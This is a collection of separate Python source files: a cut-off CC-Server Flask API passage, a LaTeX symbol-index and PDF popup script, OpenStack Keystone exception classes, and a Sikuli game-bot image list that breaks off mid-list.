@app.route('/data-containers/query/schema', methods=['GET'])
def get_data_containers_query_schema():
    """
    .. :quickref: User API; Get json-schema

    Return the (shared) query json-schema that validates
    `POST /data-containers/query <#post--data-containers-query>`__ requests.
    """
    return request_handler.get_query_schema()
@app.route('/nodes', methods=['GET'])
def get_nodes():
    """
    .. :quickref: User API; Query cluster nodes

    Query the status of all nodes in the cluster. Responds with a JSON
    object holding a ``nodes`` list; each entry reports ``cluster_node``
    (name), ``is_online``, ``total_cpus``, ``total_ram`` / ``reserved_ram``
    (MB), ``debug_info``, and the currently
    ``active_application_containers`` / ``active_data_containers``.
    """
    return request_handler.get_nodes()
@app.route('/nodes', methods=['POST'])
def post_nodes():
    """
    .. :quickref: Dev API; Update cluster nodes

    **Developer documentation**

    *Requires admin user.*

    Update the status of the cluster nodes named in the request body
    (``{"nodes": [{"name": ...}, ...]}``). Can be used to notify CC-Server
    after a dead cluster node has been repaired. Responds with an empty
    JSON object on success.
    """
    return request_handler.post_nodes()
@app.route('/tasks/query', methods=['POST'])
def post_tasks_query():
    """
    .. :quickref: User API; Query tasks

    Send a JSON query to retrieve a list of tasks. Admin users can retrieve
    every user's tasks; standard users only their own.

    **JSON fields**

    * **aggregate** (required): list of steps executed as a MongoDB
      aggregation pipeline (see the MongoDB aggregation-pipeline
      documentation). Permitted stages: $match, $project, $limit, $skip,
      $count, $sort, $unwind, $group, $sample, $replaceRoot, $addFields.

    The response is a JSON object with a ``tasks`` list containing the
    pipeline results.
    """
    return request_handler.post_tasks_query()
@app.route('/tasks', methods=['POST'])
def post_tasks():
    """
    .. :quickref: User API; Schedule tasks

    Send a JSON object with one or more task descriptions to schedule them
    with the server. A single task is posted as one description object; a
    batch is posted as ``{"tasks": [...]}``.

    **JSON fields**

    * **tags** (optional): descriptive labels used to identify tasks in the
      database.
    * **no_cache** (optional, default *false*): if *true*, no data container
      is launched and the app container downloads input files directly.
    * **application_container_description.image** (required): URL of a Docker
      image in a registry.
    * **application_container_description.container_ram** (required): RAM
      assigned to the app container in megabytes.
    * **application_container_description.registry_auth** (optional, default
      None): ``{"username": ..., "password": ...}`` for non-public images.
    * **application_container_description.entry_point** (optional, default
      from local_docker_config.toml): program invoked when starting the app
      container; only needed for customized CC-Container-Worker locations.
    * **application_container_description.parameters** (optional): JSON
      object or array handed to the app by CC-Container-Worker.
    * **input_files** (required, may be empty): input files in remote data
      repositories, each with ``connector_type`` and ``connector_access``;
      maps to the image's local_input_files list.
    * **result_files** (required): destinations for result files, each with
      ``local_result_file``, ``connector_type`` and ``connector_access``;
      maps to the image's local_result_files list.
    * **notifications** (optional): HTTP endpoints (``url``/``method``)
      notified when a task succeeds, fails or is cancelled.

    The response echoes the created ``_id`` for a single task, or a
    ``task_group_id`` plus per-task ``_id`` values for a batch.
    """
    return request_handler.post_tasks()
@app.route('/tasks/cancel', methods=['POST'])
def post_tasks_cancel():
    """
    .. :quickref: User API; Cancel tasks

    Send a JSON object with one or more task IDs to cancel them if they are
    still running. Admin users can cancel any user's tasks; standard users
    only their own.

    **JSON fields**

    * **_id** (required)

    A single cancellation is posted as ``{"_id": ...}``; a batch as
    ``{"tasks": [{"_id": ...}, ...]}``. The response mirrors the request
    shape, adding the resulting ``state`` for each task.
    """
    return request_handler.post_tasks_cancel()
@app.route('/token', methods=['GET'])
def get_token():
    """
    .. :quickref: User API; Retrieve authentication token

    Authenticate with username and password to obtain a token
    (``{"token": ..., "valid_for_seconds": ...}``). Subsequent requests may
    substitute the token for the password. Tokens are tied to the requesting
    IP address and expire after a period defined in the CC-Server
    configuration; requesting a new token always requires the original
    password.
    """
    return request_handler.get_token()
@app.route('/task-groups/query', methods=['POST'])
def post_task_groups_query():
    """
    .. :quickref: User API; Query task groups

    Send a JSON query to retrieve a list of task groups. Admin users can
    retrieve every user's task groups; standard users only their own.
    Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
    """
    return request_handler.post_task_groups_query()
@app.route('/application-containers/query', methods=['POST'])
def post_application_containers_query():
    """
    .. :quickref: User API; Query app containers

    Send a JSON query to retrieve a list of app containers. Admin users can
    retrieve every user's app containers; standard users only their own.
    Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
    """
    return request_handler.post_application_containers_query()
@app.route('/data-containers/query', methods=['POST'])
def post_data_containers_query():
    """
    .. :quickref: User API; Query data containers

    Send a JSON query to retrieve a list of data containers. Admin users can
    retrieve every user's data containers; standard users only their own.
    Works exactly like the `POST /tasks/query endpoint <#post--tasks-query>`__.
    """
    return request_handler.post_data_containers_query()
@app.route('/application-containers/callback', methods=['POST'])
def post_application_container_callback():
    """
    .. :quickref: Dev API; App container callbacks

    **Developer documentation**

    Callback endpoint for app containers reporting progress back to the
    server. Responds with an empty JSON object.

    **JSON fields**

    * **callback_key** (required)
    * **callback_type** (required)
    * **container_id** (required)
    * **content** (required): e.g. ``{"state": ..., "description": ...}``
    """
    return request_handler.post_application_container_callback()
@app.route('/data-containers/callback', methods=['POST'])
def post_data_container_callback():
    """
    .. :quickref: Dev API; Data container callbacks

    **Developer documentation**

    Callback endpoint for data containers reporting progress back to the
    server. Responds with an empty JSON object.

    **JSON fields**

    * **callback_key** (required)
    * **callback_type** (required)
    * **container_id** (required)
    * **content** (required): e.g. ``{"state": ..., "description": ...}``
    """
    return request_handler.post_data_container_callback()
def prepare():
    """Wire up the logger/master ZeroMQ sockets and build the global RequestHandler.

    Intended to be called once per worker process (from the wsgi module)
    before the first request is served. Returns the loaded Config.
    """
    import zmq
    from cc_server.commons.configuration import Config
    from cc_server.commons.helper import close_sockets
    from cc_server.services.web.request_handler import RequestHandler
    config = Config()
    context = zmq.Context()
    # PUSH socket towards the central log service; tee() sends one log line.
    logger_socket = context.socket(zmq.PUSH)
    logger_socket.connect(config.server_log['external_url'])
    tee = logger_socket.send_string
    # PUSH socket towards the master/scheduler service.
    master_socket = context.socket(zmq.PUSH)
    master_socket.connect(config.server_master['external_url'])
    # Ensure both sockets are closed when the process exits.
    atexit.register(close_sockets, [logger_socket, master_socket])
    global request_handler
    request_handler = RequestHandler(
        config=config,
        tee=tee,
        master=master_socket
    )
    tee('Started service web with pid {}'.format(os.getpid()))
    return config
def main():
    """Run the web service under gunicorn with gevent workers."""
    from cc_server.commons.configuration import Config
    from cc_server.commons.gunicorn_integration import WebApp
    config = Config()
    bind_address = '{}:{}'.format(
        config.server_web['bind_host'],
        config.server_web['bind_port']
    )
    # Worker count falls back to the machine's CPU count when unconfigured.
    options = {
        'bind': bind_address,
        'workers': config.server_web.get('num_workers', cpu_count()),
        'worker_class': 'gevent'
    }
    WebApp(app_module='cc_server.services.web.wsgi', options=options).run()
# Script entry point: start the gunicorn-hosted web service.
if __name__ == '__main__':
    main()
| |
#!/usr/bin/python
import sys, re, string
########## Symbol index generation code #############
def fail(msg):
    """Print *msg* to stderr and abort the script with exit status 1."""
    # sys.stderr.write works under both Python 2 and 3; the original
    # "print >>sys.stderr, msg" statement is Python-2-only syntax.
    sys.stderr.write("{0}\n".format(msg))
    # sys.exit instead of the bare site-provided exit() builtin.
    sys.exit(1)
symbols = dict()
def load_symbols(file):
    """Parse a file of "<id>.<key>=<value>" lines into the global symbol table.

    Repeated keys for the same id are collected under a "<key>*" list entry,
    while the plain "<key>" entry keeps the last value seen. Malformatted
    lines abort via fail().
    """
    global symbols
    with open(file, 'rt') as handle:
        for line in handle:
            match = re.match(r"([0-9]+)\.([a-z]+)=(.*)", line)
            if not match:
                fail("Malformatted line {0} in {1}".format(line, file))
            sym_id = match.group(1)
            key = match.group(2)
            val = match.group(3)
            entry = symbols.setdefault(sym_id, dict())
            entry.setdefault(key + "*", []).append(val)
            entry[key] = val
def write_index(basename):
    """Write the LaTeX symbol index to "<basename>.sdx".

    Emits one \\symbolindexentry{id}{placeholder}{description}{pages} line
    per indexed symbol (ids tagged "noindex" or "variantof" are skipped),
    followed by Emacs local-variable footer lines so the generated file
    picks up the correct TeX master. Aborts via fail() when a symbol lacks
    a macro or description.
    """
    global symbols
    with open(basename + ".sdx", 'wt') as f:
        for id in symbols:
            sym = symbols[id]
            if "noindex" in sym: continue
            if "variantof" in sym: continue
            if not "macro" in sym: fail("id {0} has no macro definition".format(id))
            macro = sym["macro"]
            # Index placeholder preference: explicit placeholder > code > macro.
            if "placeholder" in sym: placeholder = sym["placeholder"]
            elif "code" in sym: placeholder = sym["code"]
            else: placeholder = macro
            if not "description" in sym: fail("id {0} (macro {1}) has no description".format(id, macro))
            description = sym["description"]
            pages = sym["page*"] if "page*" in sym else []
            # str.split/str.join replace the deprecated string.split/string.join
            # module functions (removed in Python 3); behavior is identical.
            pages = ["\\symbolindexpage{{{0}}}{{{1}--symbolindex}}".format(*p.split(","))
                     for p in pages]
            pages = ", ".join(pages)
            f.write("\\symbolindexentry{{{0}}}{{{1}}}{{{2}}}{{{3}}}%\n".
                    format(id, placeholder, description, pages))
        f.write("""%%% {0} Variables:
%%% mode: latex
%%% coding: latin-1
%%% TeX-master: "{1}"
%%% End:""".format("Local", basename))
################# PDF popup generation code ##########################

# The PDF document being edited; set by popups_read_pdf().
popup_pdf = None
# Tunables for the popup-generation pass.
pdf_popup_config = {'compress':False,
                    'popuplinkcolor':None, # (r,g,b). None for disable
                    # None: no background link for closing all popups
                    # 'front': In front of normal links (problem with Evince: deactivates other links
                    #          even when bg link is inactive, because in Evince hidden links are still
                    #          clickable)
                    # 'back': Behind all links
                    'backgroundlink':'back',
                    # True makes the backgroundlink not cover the whole page and
                    # have a thick red border. For testing purposes
                    'backgroundlink-debug':False,
                    }
def popups_read_pdf(file):
    """Load *file* into the module-global popup_pdf document."""
    from pdfrw import PdfReader
    global popup_pdf
    popup_pdf = PdfReader(file)
def popups_write_pdf(file):
    """Write the (modified) popup_pdf document back out to *file*."""
    from pdfrw import PdfWriter
    # Version 1.5 is required for the optional-content (OCG) features used.
    w = PdfWriter(version='1.5',compress=pdf_popup_config['compress'])
    w.trailer = popup_pdf
    w.write(file)
def popup_removepages(pdf, remove):
    """Remove the pages in *remove* from *pdf* and fix up page-tree counts.

    :param pdf: the PdfReader document to edit (the original body ignored
        this parameter and operated on the global popup_pdf; using the
        parameter keeps behavior at the sole call site, which passes
        popup_pdf, while making the function reusable)
    :param remove: iterable of page objects to delete
    :raises RuntimeError: if the recount disagrees with the resulting page
        list (sanity check, should never fail)
    """
    from pdfrw import PdfDict, PdfArray, PdfName
    # Compare by object identity once, instead of scanning remove per page.
    remove_ids = set(map(id, remove))
    def removein(node):
        # Returns the number of pages remaining below *node* and prunes
        # removed pages from intermediate /Pages nodes on the way.
        if node.Type == PdfName.Pages:
            num = 0
            for p in tuple(node.Kids):
                n = removein(p)
                if n == 0: node.Kids.remove(p)
                num += n
            node.Count = num
            return num
        elif node.Type == PdfName.Page:
            if id(node) in remove_ids: return 0  # Then parent-call will remove node from pages
            return 1
    num = removein(pdf.Root.Pages)
    # Rebuild the flat page list after pruning the tree.
    pdf.private.pages = pdf.readpages(pdf.Root)
    if num != len(pdf.pages):  # Sanity check, should never fail
        raise RuntimeError((num, len(pdf.pages)))
def popup_getpopup_xobjs():
    """Convert every page tagged /SYMIDX.POPUP into a form XObject.

    Returns a dict mapping popup id -> XObject, and removes the popup
    pages from the document so they no longer appear as regular pages.

    :raises RuntimeError: if two pages carry the same /SYMIDX.POPUP id
    """
    from pdfrw.buildxobj import pagexobj
    popups = {}
    toremove = []
    for page in popup_pdf.pages:
        if page['/SYMIDX.POPUP']:
            popupid = page['/SYMIDX.POPUP'].decode()
            if popupid in popups:
                raise RuntimeError("Duplicated /SYMIDX.POPUP: {}".format(popupid))
            xobj = pagexobj(page)
            popups[popupid] = xobj
            toremove.append(page)
    popup_removepages(popup_pdf,toremove)
    return popups
# Finds all links with key /SYMIDX.SHOW and for each one returns:
# (page,popupname,rect)
# popupname = argument of /SYMIDX.SHOW
# page = a PDF page object
# rect = the rectangle of the link
# The links themselves are removed
def popup_getlinks():
    """Collect and strip all link annotations tagged with /SYMIDX.SHOW.

    Returns a list of (page, popupname, rect) tuples, where popupname is
    the decoded /SYMIDX.SHOW value and rect the link rectangle. The tagged
    annotations themselves are removed from their pages.
    """
    links = []
    for page in popup_pdf.pages:
        if page.Annots:
            # Iterate a copy; annotations are removed while scanning.
            for annot in list(page.Annots):
                if annot['/SYMIDX.SHOW']:
                    links.append((page,annot['/SYMIDX.SHOW'].decode(),annot.Rect))
                    page.Annots.remove(annot)
    return links
# Computes "n choose k"
def choose(n, k):
    """Return the binomial coefficient C(n, k) as an int.

    Uses the multiplicative formula, dividing by i+1 right after the i-th
    multiplication: that division is always exact because a product of
    i+1 consecutive integers is divisible by (i+1)!. Floor division (//)
    keeps the result an int on Python 3 as well — the original true
    division (/=) silently turned the result into a float there.
    """
    acc = 1
    for i in range(k):
        acc *= n - i
        acc //= i + 1
    return acc
# Makes a number of OCGs for combining.
# num: minimum size of the resulting code
def popup_make_ocgs(num):
    """Create enough optional-content groups (OCGs) to encode *num* popups.

    Picks the smallest n with C(n, n//2) >= num and creates n OCGs. Each
    popup gets a distinct pair (c, d): c holds exactly n//2 OCGs that must
    all be ON for the popup to show, d holds the rest. Registers the OCGs
    under Root.OCProperties (all initially OFF).

    Returns (code, ocgs, hide_ocmd, show_ocmd) where hide_ocmd is active
    only when every OCG is off and show_ocmd when any OCG is on.
    """
    from pdfrw import PdfDict, PdfArray, PdfName
    n = 2
    # n//2 keeps the argument an int under Python 3; the original n/2
    # would pass a float there and break choose()/the len comparison below.
    while choose(n, n//2) < num:
        n += 1
    ocgs = []
    for i in range(n):
        ocg = PdfDict(Type=PdfName.OCG, Name="OCG {}".format(i), indirect=True)
        ocgs.append(ocg)
    if popup_pdf.Root.OCProperties:
        # print() call form works under Python 2 and 3 for a single argument.
        print("Root.OCProperties already exists")
    ocgs = PdfArray(ocgs)
    #ocgs.indirect = True
    popup_pdf.Root.OCProperties = PdfDict(OCGs=ocgs,
                                          D=PdfDict(Order=ocgs, ON=[], OFF=ocgs))
    code = [([], [])]
    for ocg in ocgs:
        code = [(c+[ocg], d) if take else (c, d+[ocg])
                for c, d in code for take in (True, False)]
    code = [(c, d) for c, d in code if len(c) == n//2]
    # code is now an array of all different pairs (c,d)
    # where c contains floor(n/2) OCGs and d the rest of the OCGs
    hide_ocmd = PdfDict(indirect=True,
                        Type=PdfName.OCMD,
                        OCGs=ocgs,
                        P=PdfName.AllOff)
    show_ocmd = PdfDict(indirect=True,
                        Type=PdfName.OCMD,
                        OCGs=ocgs,
                        P=PdfName.AnyOn)
    return code, ocgs, hide_ocmd, show_ocmd
curr_unique_id = 0
def popup_unique_id():
    """Return a fresh positive integer, unique per call within this run."""
    global curr_unique_id
    curr_unique_id = curr_unique_id + 1
    return curr_unique_id
# Creates a popup in the document
# page: where to create the popup? (PDF page object)
# rect: the area which should open the popup? [x y w h]
# popupname: a unique identifier for this popup
# (i.e., different invokcations of make_popup have the same "popupname"
# iff they have the same "popup")
# popup: an XObject containing the graphics that should pop up
# code: A pair (on,off), each a list of OCGs.
# on+off should be all OCGs used for controlling the popups
# and the popup will be shown iff all OCGs in on are active.
# This pair should be unique for each make_popup call.
# And no "on" from one call should be a subset of "on" from another call.
#
# This function installs the popup XObject below the link and makes
# the link activate/deactivate the OCGs for/not for the current popup
def make_popup(page,rect,popupname,popup,code):
    """Install one popup on *page*: a link annotation that toggles the OCG
    codeword, plus the popup XObject drawn inside an /OC marked-content block.

    :param page: PDF page object receiving the popup
    :param rect: link rectangle [x0 y0 x1 y1]
    :param popupname: unique identifier for this popup's graphics
    :param popup: form XObject containing the popup graphics
    :param code: pair (on, off) of OCG lists; the popup is visible iff all
                 OCGs in *on* are active
    """
    from pdfrw import PdfDict, PdfArray, PdfName
    from pdfrw.uncompress import uncompress
    codeword_on,codeword_off = code
    # Clicking the link switches the other popups' OCGs off and ours on.
    show_action = PdfDict(S=PdfName.SetOCGState,
                          State=PdfArray([PdfName.OFF]+codeword_off+[PdfName.ON]+codeword_on))
    link = PdfDict(indirect=True,
                   Type=PdfName.Annot,
                   H=PdfName.I,
                   Subtype=PdfName.Link,
                   A=show_action,
                   Rect=rect)
    if pdf_popup_config['popuplinkcolor']:
        link.C = PdfArray(pdf_popup_config['popuplinkcolor'])
    else:
        link.Border = [0,0,0]
    page.Annots.append(link)
    # OCMD that is active exactly when this popup's full codeword is on.
    ocmd = PdfDict(Type=PdfName.OCMD,
                   OCGs=codeword_on,
                   P=PdfName.AllOn)
    popup_pdfname = '/SPopup'+popupname
    ocmd_pdfname = '/SPopupOCMD{}'.format(popup_unique_id())
    if not page.Resources.Properties: page.Resources.Properties = PdfDict()
    if not page.Resources.XObject: page.Resources.XObject = PdfDict()
    page.Resources.XObject[popup_pdfname] = popup
    page.Resources.Properties[ocmd_pdfname] = ocmd
    if page.Contents.Filter:
        uncompress([page.Contents]) # Important. Otherwise appending to stream add plain text to compressed stream
    # Draw the popup XObject below the link, wrapped in the OCMD's
    # marked-content block so it only renders while the popup is active.
    page.Contents.stream += "q /OC {ocmd} BDC 1 0 0 1 {x} {y} cm {popup} Do EMC Q\n".\
        format(x=rect[0],y=float(rect[1])-popup.BBox[3],
               ocmd=ocmd_pdfname,
               popup=popup_pdfname)
# Deactivates all links when a popup is active
# hide_ocmd: A OCMD that is active only if no popup is active
#            (I.e., if all OCGs in the code are inactive)
def popup_hide_links(hide_ocmd):
    """Attach *hide_ocmd* as the /OC entry of every link annotation so that
    ordinary links are disabled while any popup is visible."""
    for page in popup_pdf.pages:
        for annot in page.Annots if page.Annots else ():
            if annot.OC:
                # print() call form works under Python 2 and 3 for a single
                # argument; the original Python-2-only print statement is a
                # syntax error under Python 3.
                # NOTE(review): despite the "Ignoring" message, the existing
                # /OC entry is overwritten below — confirm intent.
                print("Annotation {} already has an /OC-entry. Ignoring.".format(annot.OC))
            annot.OC = hide_ocmd
# Creates, on each page, a whole page link that deactivates all OCGs
# show_ocmd: an OCMD that is active if a popup is shown
#            (i.e., if some OCG is active)
# ocgs: all OCGs
def popup_bg_links(show_ocmd, ocgs):
    """Add a page-covering "close all popups" link to every page.

    The link is only active while a popup is shown (via *show_ocmd*) and,
    when clicked, switches every OCG off. Placement (in front of or behind
    normal links) is governed by pdf_popup_config['backgroundlink'].

    :raises ValueError: for an unsupported 'backgroundlink' setting
    """
    from pdfrw import PdfDict, PdfArray, PdfName
    if not pdf_popup_config['backgroundlink']: return
    if pdf_popup_config['backgroundlink'] not in ('front','back'):
        raise ValueError("pdf_popup_config['backgroundlink'] must be front or back or None")
    for page in popup_pdf.pages:
        rect = page.MediaBox
        if pdf_popup_config['backgroundlink-debug']: rect = [90,800,180,200]
        link = PdfDict(indirect=True,
                       Type=PdfName.Annot,
                       H=PdfName.N,
                       Subtype=PdfName.Link,
                       Rect=rect,
                       #F=2, # Link is hidden
                       Border=[0,0,10] if pdf_popup_config['backgroundlink-debug'] else [0,0,0],
                       C=[1,0,0] if pdf_popup_config['backgroundlink-debug'] else None,
                       OC=show_ocmd,
                       A=PdfDict(S=PdfName.SetOCGState,
                                 State=PdfArray([PdfName.OFF]+ocgs)),
                       )
        if page.Annots is None: page.Annots = PdfArray()
        if pdf_popup_config['backgroundlink']=='back':
            page.Annots.insert(0,link)
        elif pdf_popup_config['backgroundlink']=='front':
            page.Annots.append(link)
        else:
            # Defensive; unreachable because of the validation above.
            # Fixed: "RuntimeException" does not exist in Python — raising it
            # would itself have raised a NameError.
            raise RuntimeError("Unexpected value")
def install_popups():
    """Turn all /SYMIDX popup pages and /SYMIDX.SHOW links into OCG popups."""
    # Must run before popup_getlinks()/popup_hide_links(): otherwise they
    # would also pick up the links living on the popup pages themselves.
    popups = popup_getpopup_xobjs()
    links = popup_getlinks()
    code, ocgs, hide_ocmd, show_ocmd = popup_make_ocgs(len(links))
    popup_hide_links(hide_ocmd)
    popup_bg_links(show_ocmd, ocgs)
    # Assign each link its own OCG codeword and install the popup graphics.
    for idx, (page, popupname, rect) in enumerate(links):
        make_popup(page, rect, popupname, popups[popupname], code[idx])
# Command-line entry point: either patch popups into an existing PDF
# ("install-popups <pdf-file>") or build the symbol index for <basename>.
if len(sys.argv)<=1: fail("Invocation: makesymind.py <basename>")
if sys.argv[1] == 'install-popups':
    if len(sys.argv)!=3: fail("Invocation: makesymind.py install-popups <pdf-file>")
    # Read, transform, and rewrite the PDF in place.
    popups_read_pdf(sys.argv[2]); install_popups(); popups_write_pdf(sys.argv[2])
else:
    if len(sys.argv)!=2: fail("Invocation: makesymind.py <basename>")
    basename = sys.argv[1]
    # Build <basename>.sdx from the symbols recorded in <basename>.syi.
    load_symbols(basename+".syi")
    write_index(basename)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from keystone.common import config
from keystone.common import logging
# Shortcuts for the global configuration and this module's logger.
CONF = config.CONF
LOG = logging.getLogger(__name__)
# Tests use this to make exception message format errors fatal
# (when True, a missing format kwarg re-raises instead of logging a warning).
_FATAL_EXCEPTION_FORMAT_ERRORS = False
class Error(StandardError):
    """Base error class.

    Child classes should define an HTTP status code, title, and a doc string.
    """
    # NOTE(review): StandardError exists only on Python 2; a Python 3 port
    # would need to derive from Exception instead.
    code = None   # HTTP status code reported to the client
    title = None  # HTTP reason phrase

    def __init__(self, message=None, **kwargs):
        """Use the doc string as the error message by default."""
        try:
            message = self._build_message(message, **kwargs)
        except KeyError as e:
            # if you see this warning in your logs, please raise a bug report
            if _FATAL_EXCEPTION_FORMAT_ERRORS:
                raise e
            else:
                LOG.warning('missing exception kwargs (programmer error)')
                # Fall back to the raw, unformatted docstring.
                message = self.__doc__
        super(Error, self).__init__(message)

    def _build_message(self, message, **kwargs):
        """Builds and returns an exception message.

        :raises: KeyError given insufficient kwargs
        """
        # The class docstring doubles as a %-format template for kwargs.
        return message or self.__doc__ % kwargs

    def __str__(self):
        """Cleans up line breaks and indentation from doc strings."""
        string = super(Error, self).__str__()
        # Collapse the docstring's newlines and indentation to single spaces.
        string = re.sub('[ \n]+', ' ', string)
        string = string.strip()
        return string
class ValidationError(Error):
    """Expecting to find %(attribute)s in %(target)s.

    The server could not comply with the request since it is either malformed
    or otherwise incorrect.

    The client is assumed to be in error.
    """
    # Docstring placeholders are filled from kwargs by Error._build_message.
    code = 400
    title = 'Bad Request'


class StringLengthExceeded(ValidationError):
    """The length of string "%(string)s" exceeded the limit of column
    %(type)s(CHAR(%(length)d))."""


class ValidationSizeError(Error):
    """Request attribute %(attribute)s must be less than or equal to %(size)i.

    The server could not comply with the request because the attribute
    size is invalid (too large).

    The client is assumed to be in error.
    """
    code = 400
    title = 'Bad Request'
class SecurityError(Error):
    """Avoids exposing details of security failures, unless in debug mode."""

    def _build_message(self, message, **kwargs):
        """Only returns detailed messages in debug mode."""
        if CONF.debug:
            # Debug deployments may see the caller-supplied message.
            return message or self.__doc__ % kwargs
        else:
            # Production: always fall back to the generic class docstring.
            return self.__doc__ % kwargs
class Unauthorized(SecurityError):
    """The request you have made requires authentication."""
    code = 401
    title = 'Unauthorized'


class AuthPluginException(Unauthorized):
    """ Authentication plugin error. """
    def __init__(self, *args, **kwargs):
        super(AuthPluginException, self).__init__(*args, **kwargs)
        # Extra payload plugins may attach to the error response.
        self.authentication = {}


class AuthMethodNotSupported(AuthPluginException):
    """ Attempted to authenticate with an unsupported method. """
    def __init__(self, *args, **kwargs):
        super(AuthMethodNotSupported, self).__init__(*args, **kwargs)
        # Advertise which auth methods the deployment actually supports.
        self.authentication = {'methods': CONF.auth.methods}


class AdditionalAuthRequired(AuthPluginException):
    """ Additional authentications steps required. """
    def __init__(self, auth_response=None, **kwargs):
        super(AdditionalAuthRequired, self).__init__(message=None, **kwargs)
        # Carries the partial auth response describing the remaining steps.
        self.authentication = auth_response


class Forbidden(SecurityError):
    """You are not authorized to perform the requested action."""
    code = 403
    title = 'Not Authorized'


class ForbiddenAction(Forbidden):
    """You are not authorized to perform the requested action: %(action)s"""
class NotFound(Error):
    """Could not find: %(target)s"""
    code = 404
    title = 'Not Found'


# Per-resource 404s; each docstring placeholder is filled from kwargs by
# Error._build_message.
class EndpointNotFound(NotFound):
    """Could not find endpoint: %(endpoint_id)s"""


class MetadataNotFound(NotFound):
    """An unhandled exception has occurred: Could not find metadata."""
    # (dolph): metadata is not a user-facing concept,
    # so this exception should not be exposed
class Conflict(Error):
    """Conflict occurred attempting to store %(type)s.

    %(details)s
    """
    code = 409
    title = 'Conflict'


class RequestTooLarge(Error):
    """Request is too large."""
    code = 413
    title = 'Request is too large.'


class UnexpectedError(Error):
    """An unexpected error prevented the server from fulfilling your request.

    %(exception)s
    """
    code = 500
    title = 'Internal Server Error'


class MalformedEndpoint(UnexpectedError):
    """Malformed endpoint URL (see ERROR log for details): %(endpoint)s"""


class NotImplemented(Error):
    """The action you have requested has not been implemented."""
    # NOTE(review): this class name shadows the builtin NotImplemented
    # constant within this module; renaming would break external callers.
    code = 501
    title = 'Not Implemented'
| |
from sikuli import *
class Map(object):
    """Base image registry for a single game map.

    Subclasses override the per-category lists with the Sikuli image
    names (or ``Pattern`` objects) to search for on that map.
    """

    # Per-category search targets; empty in the base class and
    # populated by each MapN subclass.
    normal = []
    armored = []
    strong = []
    boss = []

    # Lion images are shared across every map, so they live on the base.
    lions = [
        "blue_lion_2.png",
        "red_lion_2.png",
        "green_lion_2.png",
        "null_lion_2.png",
    ]
# NOTE(review): list order may matter — presumably these are tried in order by
# the Sikuli search loop, so entries are documented but deliberately not
# reordered or deduplicated here.

class Map1(Map):
    # Map 1 enemy images, keyed by toughness category.
    normal = [
        "skeleton_null.png",
        "skeleton_red.png",
        "skeleton_blue.png",
        "gargoyle_blue.png",
        "gargoyle_null.png",
        "gargoyle_green.png",
        "gargoyle_red.png",
        "cat_null.png",
        "savage_null.png",
        "savage_green.png",
        "wolf_blue.png",
        "wolf_red.png",
        "wolf_null.png",
        "wizard_null.png",
        "wizard_null_2.png",
        "bat_null.png"
    ]
    armored = [
        "armor_null.png"
    ]
    strong = [
        "garm_red.png"
    ]
    # Boss phases use a lowered similarity threshold to tolerate animation.
    boss = [
        Pattern("boss_1_stage_1.png").similar(0.69),
        Pattern("boss_1_stage_2.png").similar(0.69),
        Pattern("boss_1_stage_3.png").similar(0.69)
    ]


class Map2(Map):
    # Map 2 enemy images.
    normal = [
        "gargoyle_blue.png",
        "wolf_blue.png",
        "skeleton_blue.png",
        "savage_blue.png",
        "wolf_red.png",
        "cat_blue.png",
        "bat_green.png",
        "bee_blue.png",
        "frog_null.png",
        "savage_red.png",
        "snake_null.png",
        "savage_null.png",
        "savage_green.png"
    ]
    armored = [
        "crab_null.png",
        "scorpion_blue.png"
    ]
    strong = [
        "garm_red.png"
    ]
    # Early boss phases match more loosely (0.60) than the later ones.
    boss = [
        Pattern("boss_2_stage_1.png").similar(0.60),
        Pattern("boss_2_stage_2.png").similar(0.60),
        Pattern("boss_2_stage_3.png").similar(0.69),
        Pattern("boss_2_stage_4.png").similar(0.69)
    ]


class Map3(Map):
    # Map 3 enemy images.
    normal = [
        "savage_red.png",
        "frog_green.png",
        "skeleton_red.png",
        "wolf_green.png",
        "snake_red.png",
        "bat_green.png",
        "bat_blue.png",
        "chicken_null.png",
        "gargoyle_red.png",
        "frog_blue.png",
        "frog_red.png",
        "frog_null.png",
        "bee_red.png",
        "bat_red.png",
        "cat_red.png"
    ]
    armored = [
        "crab_green.png",
        "crab_null.png",
        "turtle_null.png"
    ]
    strong = [
        "big_dog_red.png",
        "liger_red.png"
    ]
    boss = [
        Pattern("boss_3_stage_1.png").similar(0.69),
        Pattern("boss_3_stage_2.png").similar(0.69),
        Pattern("boss_3_stage_3.png").similar(0.69),
        Pattern("boss_3_stage_4.png").similar(0.69)
    ]


class Map4(Map):
    # Map 4 enemy images.
    normal = [
        "frog_green.png",
        "snake_green.png",
        "bee_null.png",
        "wolf_blue.png",
        "chicken_red.png",
        "chicken_green.png",
        "bee_green.png",
        "savage_green.png", "savage_blue.png", "cat_green.png", "skeleton_green.png"
    ]
    armored = [
        "armor_null.png",
        "turtle_green.png", "scorpion_red.png", "crab_null.png"
    ]
    strong = [
        "big_dog_green.png", "reaper_null.png", "garm_blue.png"
    ]
    boss = [
        Pattern("boss_4_stage_1.png").similar(0.80),
        Pattern("boss_4_stage_2.png").similar(0.80),
        Pattern("boss_4_stage_3.png").similar(0.80),
        Pattern("boss_4_stage_4.png").similar(0.80)
    ]


class Map5(Map):
    # Map 5 enemy images; note "boss_5_mob.png" is treated as a normal mob.
    normal = [
        "wolf_red.png",
        "frog_null.png",
        "bee_blue.png",
        "chicken_blue.png",
        "skeleton_blue.png",
        "skeleton_red.png",
        "snake_blue.png",
        "cat_blue.png",
        "bat_blue.png",
        "cat_red.png", "cat_green.png", "cat_null.png",
        "boss_5_mob.png"
    ]
    armored = [
        "crab_blue.png", "crab_green.png",
        "turtle_blue.png",
        "scorpion_green.png"
    ]
    strong = [
        "big_dog_blue.png",
        "liger_blue.png",
        "garm_green.png",
        "minotaur_red_null.png"
    ]
    boss = [
        Pattern("boss_5_stage_1.png").similar(0.80),
        Pattern("boss_5_stage_2.png").similar(0.80),
        Pattern("boss_5_stage_3.png").similar(0.80),
        Pattern("boss_5_stage_4.png").similar(0.80)
    ]


class Map6(Map):
    # Map 6 enemy images.
    normal = [
